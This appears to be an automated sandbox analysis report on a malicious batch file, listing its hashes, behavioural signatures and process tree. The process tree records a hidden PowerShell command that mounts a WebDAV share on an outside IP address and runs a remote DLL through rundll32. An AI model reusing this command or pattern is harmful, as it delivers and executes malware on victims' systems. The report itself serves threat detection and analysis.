Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 06:49
Static task
static1
Behavioral task
behavioral1
Sample
2544716741820331212.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
2544716741820331212.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
2544716741820331212.bat
-
Size
2KB
-
MD5
cfefab70aee9445383eb81d12e59303f
-
SHA1
70d2b251be35f72ef6928a42a96fb7a254f236ea
-
SHA256
a9085f33c769bd9a421afab70bffdb533f83f8f2f5dedd95a8bdf30fdbe3294f
-
SHA512
b33f13d77d9bf2f0c4410c53c01213178db04f3cbb4fdc11b7e1f59f05f85b9d8f2d671474818e7f16db32e86556e36fd8ab0c17df2cdb01844c887394eb7b09
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2364 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2500 wordpad.exe 2500 wordpad.exe 2500 wordpad.exe 2500 wordpad.exe 2500 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1996 wrote to memory of 2500 1996 cmd.exe 31 PID 1996 wrote to memory of 2500 1996 cmd.exe 31 PID 1996 wrote to memory of 2500 1996 cmd.exe 31 PID 1996 wrote to memory of 2364 1996 cmd.exe 32 PID 1996 wrote to memory of 2364 1996 cmd.exe 32 PID 1996 wrote to memory of 2364 1996 cmd.exe 32 PID 2364 wrote to memory of 2264 2364 powershell.exe 34 PID 2364 wrote to memory of 2264 2364 powershell.exe 34 PID 2364 wrote to memory of 2264 2364 powershell.exe 34 PID 2364 wrote to memory of 2432 2364 powershell.exe 35 PID 2364 wrote to memory of 2432 2364 powershell.exe 35 PID 2364 wrote to memory of 2432 2364 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2544716741820331212.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\591.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2264
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\591.dll entry3⤵PID:2432
-
-